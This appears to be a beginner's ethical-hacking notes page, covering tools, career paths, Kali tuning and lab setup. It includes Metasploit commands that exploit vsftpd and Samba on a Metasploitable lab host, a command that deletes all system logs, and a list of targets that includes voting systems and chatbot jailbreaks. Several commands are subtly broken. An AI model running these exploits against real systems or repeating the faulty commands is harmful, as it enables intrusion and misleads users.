Theme Switcher
Menu Icon
Home

Ethical Hacking

Ethical hacking is a practice of identifying and exposing vulnerabilities in computer systems, networks or applications to improve their security.

The goal of cyber security is to ensure systems work only as intended.

Quick tips for beginners

✅ Understand first then hack.
✅Don’t get intimidated by a scope, break it down into functions.
✅Don’t assume everything has been found.
✅Look for lesser known features.
✅Consistency is key to survival.
✅Your most powerful tool is patience. -
❗Hacking is 99% boredom, 1% terror.
✅Don’t learn to hack, hack to learn.

Ethics & legal Considerations

Cyber security Bills

  • Computer Fraud and Abuse Act (CFAA)
  • International Telecommunication Union (ITU)
  • NSO Group: nsogroup.com
  • The Children Online Privacy Protection Act

Security operations

  • Detection
  • Protection
  • Active defense
  • Data leakages
  • Incidence response
  • Vulnerabilities management
  • Security Information and Event Management (SIEM)
  • Security Operations Center(SOC)

Governance Risk and Compliance (GRC)

  • Policy alignment
  • Scope definition
  • Reporting structure
  • Risk Identification and mitigation
  • Regulatory requirements standards i.e. GDPR, PCI DSS, HIPAA
  • Audit support
  • Data protection

Written Supervisory Procedures(WSPs)

  • Policy
  • Procedure
  • Standards
  • Guidelines
  • Compliance & enforcement

Laws and regulations

Federal

  • Department of Homeland Security
  • INTERPOL

State

  • Country Specific
  • International relations
  • US-CERT
  • Kenya Computer Incident Response Team Coordination Center (National KE-CIRT/CC)

Industry Specific

Varies depending on the sector.

  • Private sectors
  • Public sector
  • Non Government Organisations (NGOs)

Frameworks & standards.

Common Frameworks

  • ATT&CK - Adversarial Tactics Techniques And Common Knowledge
  • Kill Chain
  • Diamond Model

Hacking Motives

  • Challenge - learn
  • Recognition - bond, acquire
  • Curiosity - learn
  • Ideology - political, religious
  • Greed - money
  • State-sponsored
  • Corporate espionage

Attack = Motive + Method + Vulnerability

📌 Hackers are not criminals, they are explorers and inventors.

Hacking Competitions

Elements of a Security System

C.I.A Triad

  • Confidentiality
  • Integrity
  • Availability

📌 There exists no perfectly secure system.
📌 Secrecy is security.

D.A.D Triad (Attack Techniques)

  • Disclosure
  • Alteration
  • Destruction


Career development

  • Continuous education (Self-study, Certifications)
  • Technical development
  • Practical experience (CTFs, Open source, Internships)
  • Portfolio building
  • Networking (Conferences, webinars, communities)


Cyber Security Career Paths

Category Roles
Offensive Operations
  • Red Team Member
  • Pen Tester
Defensive Operations
  • Cyber Intelligence Specialist
  • Data Privacy Officer
  • Information Security Analyst
  • SOC Analyst
  • SCADA Security Analyst
  • IT Security Architect
Leadership
  • Chief Security Officer (CSO)
  • Chief Information Security Officer (CISO)
  • SOC Manager
Incident Response & Threat Hunting
  • Threat Hunter
  • Incident Responder
  • Malware Analyst
  • Ethical Hacker

Hacker skill levels

Script kiddies(begginer)
Green hat(basic techniques)
Hacker group
Hactivist(advanced techniques)
Botnet hackers
Cyber terrorist

Hacker skill sets.

Technical skills

  • Operating system knowledge
  • Computer Networking skills
  • Hardware & software capabilities
  • Past vulnerabilities & attacks
  • Software development

Non-technical skills

  • Learning ability
  • Problem solving skills
  • Communication skills
  • Laws & regulations awareness

Hacking competitions.

  • AFA cyberPayriot: uscyberpatriot.org
  • DEFCON CTF: defcon.org
  • Deutsche Hacking Meisterschaft: hacking-meisterschaft.de
  • European Cyber security challenges (ECSC): ecsc.eu
  • Google CTF: capturetheflag.withgoogle.com
  • HackerRank: hackerrank.com

Types of hackers

  1. White hat - Ethical
  2. Grey hat - Neutral
  3. Black hat - Bad guy
  • Red team - attackers
  • Blue team - defenders
  • Yellow team - builders

Ethical hacking Phases

  • 1. Information gathering
  • 2. Scannning and Enumeration
  • 3. Exploitation/Gaining access
  • 4. Post exploitation / Maintaining Access
  • 5. Clearing tracks
  • 6. Analysis and reporting

Hacking Lab set-up.

Virtual environment.

  • VMware workstation player
  • Oracle Virtual Box
  • Windows sandbox

Operating Systems used by Hackers

  • Kali linux
  • Parrot
  • Backbox
  • Pentoo
  • DracOS
  • Cyborg
  • Deft linux
  • Backarch
  • Arch strike
  • Mobelexr - Mobile apps
  • Pentest Box
  • Windows Subsystem for Linux (WSL)
  • Rooted Mobile phone

Vulnerable tools

  • Metasploitable 1 & 2
  • Microsoft Windows 07, 08, 10, 11
  • Quoar
  • Sedna
  • Badstore
  • OWASP Broken Web Application VM
  • Hack This Site
  • Root me
  • Hacker 101
  • Capture The Flag 101
  • Hack-A-Sat
  • Try hack me
  • Hack The Box

Essential tools

Reconnaissance phase

  • Nmap
  • Maltego-ng
  • Recon-ng
  • Shodan
  • theHarvester

Scanning and enumeration 

  • Wireshark
  • Nessus 
  • Nikto
  • OpenVAS
  • Burp Suite

Exploitations 

  • Metasploit Framework 
  • SQLmap
  • John the Ripper 
  • Hydra
  • Aircrack-ng 

Maintaining Access 

  • Cobalt strike 
  • Empire
  • Mimikatz
  • Netcat
  • PowerSploit

Kali LInux Operating System

Optimize/ Customize Kali Linux.

✅ Optimized performance (faster boot, reduced RAM usage)

✅ Reduced storage (removed unneeded tools)

✅ Customized networking & security settings.

❌ Kernel & system updates might introduce new settings that need re-tweaking.

❌ DNS and network settings might be reset unless locked.

Use a Lightweight Desktop Environment i.e LXQt, Openbox, or i3 etc

Install LXQt (Lightweight alternative to XFCE)


$sudo apt install kali-desktop-lxqt -y 
$sudo apt install openbox obconf obmenu -y
$sudo apt remove --purge kali-desktop-xfce -y
$sudo apt autoremove -y

Remove Unnecessary Tools & Packages


$dpkg --get-selections | grep kali
$sudo apt remove --purge kali-linux-forensic kali-linux-voip kali-linux-wireless -y
$sudo apt autoremove -y

To remove all Kali pre-installed tools and keep only the essentials:


$sudo apt remove --purge kali-linux-default -y
$sudo apt autoremove -y

📌If you only need specific tools, install them manually instead.

Reduce Background Services & Daemons

Check Running Services


$systemctl list-unit-files --type=service | grep enabled

Disable Unnecessary Services

 
$sudo systemctl disable $bluetooth.service
$sudo systemctl stop bluetooth.service

Disable NetworkManager-wait-online, which can slow down boot times


$sudo systemctl disable NetworkManager-wait-online.service

Optimize Storage & Clean Up Junk Files

Remove Old Dependencies & Cached Packages


$sudo apt autoremove -y
$sudo apt clean -y
$sudo apt autoclean -y

Delete Log Files


$sudo rm -rf /var/log/*
$sudo journalctl --vacuum-time=7d

Check for Large unused Files & clear it


$sudo -sh /var/cache/apt
$sudo rm -rf /var/cache/apt/archives/*

Reduce RAM Usage & Improve Performance

Use ZRAM (Compressed Swap in RAM)


 $sudo apt install zram-tools -y
 $sudo systemctl enable --now zramswap.service

Reduce Swappiness


$echo 'vm.swappiness=10' | sudo tee -a /etc/sysctl.conf
$sudo sysctl -p

Optimize Boot Speed

Disable Unnecessary Boot Services


$systemctl list-unit-files --type=service --state=enabled

Disable unnecessary services


$sudo systemctl disable <service-name>

Use Systemd-analyze to Check Boot Time


$systemd-analyze
$systemd-analyze blame

Optimize Network & DNS for Faster Browsing

Use a Fast DNS Resolver, Edit /etc/resolv.conf:


$sudo nano /etc/resolv.conf

Replace with: nameserver 1.1.1.1 nameserver 8.8.8.8

Then, prevent automatic changes:


$sudo chattr +i /etc/resolv.conf

Install a Lighter Terminal Emulator

Instead of using GNOME Terminal, switch to Alacritty or Kitty:


$sudo apt install alacritty -y

Use a Minimal Kernel (Optional)

You can install a minimal kernel for lower RAM usage:


$sudo apt install linux-image-rt-amd64 -y

Reboot your system to apply all optimizations:

$sudo reboot

📌Reduced Storage Usage by removing unnecessary packages

📌Faster Boot Time by disabling unneeded services

📌Lower RAM Usage with ZRAM and swappiness tuning

📌Improved Network Speed with optimized DNS

Custom Kali Linux ISO

Install live-build and Dependencies


$sudo apt update && 
$sudo apt install -y live-build cdebootstrap curl git

Clone the Kali Linux ISO Builder


$git clone https://gitlab.com/kalilinux/build-scripts/live-build-config.git
$cd live-build-config

Remove Unnecessary Packages


$nano kali-config/variant-default/package-lists/kali.list.chroot

Remove unnecessary tools: Delete lines for forensics, VoIP, and wireless tools if you don’t need them.

Add performance tools: Add ZRAM, a lightweight terminal, and network optimizations etc


                           zram-tools
                           Alacritty
                           Resolvconf

Save and exit (CTRL + X, then Y, then ENTER).

Optimize System Settings


$nano kali-config/common/includes.chroot/etc/sysctl.conf

Add:


vm.swappiness=10
fs.inotify.max_user_watches=524288
net.core.default_qdisc=fq
net.ipv4.tcp_congestion_control=bbr

Save and exit.

Customize Boot Services

Disable unnecessary services by creating a script


$nano kali-config/common/hooks/00-disable-services.chroot

Add:


#!/bin/bash
systemctl disable bluetooth.service
systemctl disable NetworkManager-wait-online.service
systemctl disable ModemManager.service

Save, then make it executable:


$chmod +x kali-config/common/hooks/00-disable-services.chroot

Build the Custom ISO

Run the following command to start the ISO build process:


$sudo ./build.sh --variant default --verbose

This will take some time depending on your system's performance.

Test Your Custom Kali ISO

Once the build is done, find your ISO in the images/ folder


$ls -lh images/

Now, test it in VMware or VirtualBox:

Create a new VM and select your custom ISO as the installation medium.

Parrot Security OS.


$sudo su
$passwd root
$sudo apt update && apt upgrade -y

Install your preferred media player i.e media codecs

Install graphics drivers i.e nividia

Install parrot metapackages


                           $sudo apt install parrot-tools-full

Install your preffered penetration testing tools i.e
Angry IP scanner
Nessus

Metasploit Framework

Components of MF

1.Exploit
2.Payload
3.Modules
4.Listeners
5.Shellcodes

Utilities

  1. Msfpayload - generate shellcodes, executables
  2. MSFencode - evade antivirus
  3. Nasm shell - identify opcodes(assembly instructions)

Metasploit Interfaces
1. MsfConsole
2. Armitage - GUI

   
$sudo apt install armitage
$service postresql start
$sudo armitage
$service metasploit start

Metasploit express - web interface

Meterpreter - remote shell

BurpSuite Framework

Burp configuration

Firefox Setting >> Network Settings >> Manual Proxy 127.0.0.1:8080

BurpSuite proxy >> Proxy Settings >> Certificate (burp_cert.cre) Firefox settings >> Advanced Tab >> View Certificates >> Authorities >> Import

Sections of burp suite

  1. Target section - victim
  • Sitemap
  • Scope
  1. Proxy section - requests & responses
  • Intercept
  • HTTP history
  • Web sockets
  1. Repeater section - manual test
  • Requests
  • Response
  1. Intruder section - health automata
  • Targets
  • Positions
  • Payloads
  1. Sequencer - randomness
  • Cookies
  • Tokens

  1. Scanner - automated scanning

  2. Spider

  3. Decoder - encode & decode

  • HTML
  • Base64
  • ASCII hex
  • hex, ictal, binary
  • Gzip
  1. Scanner 
  2. Comparer
  3. Extender
  • write custom extension, plugins
  1. Options
  2. Alert

Metasploitable 3

System requirements
65 GB available disk space
4.5 GB RAM
Vagrant
Vagrant reload plugin
Packer
Git clone metasploitable 3

Installation of metasploitable 3

Vmware


>Vagrant plugin install vagrant-vmware-desktop
>vagrant plugin install vagrant-reload
>vagrant box list
>vagrant box add rapid7/metasploitable3-win2k8 --provider vmware_desktop
>vagrant box remove rapid7/metasploitable3-ub1404 --provider vmware_desktop
>vagrant up OR >vagrant up win2k8

In vagrant directrory


>slmgr /rearm
>. \build.ps1
>. \build.ps1 windows2008 or Ubuntu 1404

Virtual box


>vagrant plugin install vagrant-vbguest
>vagrant plugin install vagrant-reload
>set-ExecutionPolicy Unrestricted
>.\build.ps1
>.\build.ps1 windows2008 or Ubuntu 1404

OR


>. \packer.exe build. \windows_10_choco.json
>Vagrant box add win10 windows_10_virtualbox.box
>cd win10
>vagrant init win10
>vagrant up

📌Default credentials are Username: Vagrant password : vagrant

Metasploitable 2.

Official website: Rapid 7 website

System requirements

  • Windows 7/8/10/11

  • VT-x/AMD-V supported processor

  • Minimum of 30GB HDD space

  • Minimum of 4GB RAM

  • Default credentions are Username: msfadmin and Password: msfadmin

Components of metasplotable 2

  • TWiki
  • phpMyAdmin
  • Multilidae
  • DVWA
  • WebDAV

Penetration testing on metasploitable 2


$ifconfig #run this on target machine (metasploitable 2)
$nmap -sV -O 172.16.225.128
$msfconsole

Very Secure FTP exploitaion


$msfconsole
msf6>search vsftpd
msf6>use exploit/unix/ftp/vsftpd_234_backdoor
msf6>set RHOST 172.16.225.128
msf6>run

metepreter>whoami

VNC Remote Login Exploitation


$msfconsole
>search vnc login
>use auxiliary/scanner/vnc/vnc_login
>set RHOST 172.16.225.128
>run
$vncviewer 172.16.225.128

Samba server exploitation

$msfconsole
>search usermap script
>exploit/multi/samba/usermap_script
>set RHOST 172.16.225.128
>exploit

metepreter>whoami

Rooting Android phone

Requirements/Tools
1.Island apk from playstore
2.Magisk
3.Termux
4.Kali Linux
5.Cometin
6. OEM enabled on Android developer options.
7.Fdroid
8.VNC

Enabling OEM before rooting


$adb reboot recovery
$adb devices
$adb sideload update.zip
$termux-setup-storage
$wget -O install-nethunter-termux https://offsec/zMcrZWr
$chmod +x install-nethunter-termux
$./install-nethunter-termux
$nethunter -r -> root access
$kex passwd -> set VNC password
$kex & -> launch VNC server

Common targets for hackers.

  1. Financial institutions
  • Banking systems
  • Cryptocurrency
  • Saccos
  • Mobile banking
  • ATM machines
  • Supply chain vendors


  1. Infrastructure
  • electric grids
  • natural gas lines
  • Electric vehicles


  1. Systems
  • E-commerce
  • Betting - money
  • School - fee records, report cards
  • Healthcare - patients records
  • Voting systems
  • Tax authority ie KRA


  1. Social media Accounts
  • Meta(FB, IG, WhatsApp)
  • X(formaly Twitter)
  • LinkedIn
  • Telegram,Signal, 


  1. AI models
  • Jailbreak chatbots
  • IoT devices


  1. Computer Networks 
  • Wi-fi, Server, router
  • Surveillance - CCTV, Webcams
  • Satellites communication


  1. Video games
  • make game easier
  • Coins, wins, strength


  1. Bussiness
  • Valuable data - credit cards, ID
  • Espionage - spying competitors


  1. Telecommunication
  • Calls & SMS
  • TV & Radio channels

Some useful browser extensions

  • Cookie editor
  • Firebug lite for google chrome
  • D3coder
  • EndPointer
  • Built with
  • Form fuzzer
  • Session manager
  • Request maker
  • Shodan
  • XSS rays
  • WebSecurify
  • Port scanner
  • XSS chef
  • HPP finder
  • The exploit database
  • GHDB
  • IP address and domain information
  • Retire js
  • Temper monkey
  • Foxy proxy
  • Site spider

Cybersecurity Learning Resources

📚 Books

📝 Blogs

🎓 Courses / Certifications

  • Certified Ethical Hacker (CEH)
  • CompTIA Security+
  • ISC2 - CCSP, CISSP
  • CCE (Certified Computer Examiner)

💻 GitHub Repositories

📺 Videos & Tutorials

❗ YouTube hacking tutorials are for script kiddies 😅

🌐 Websites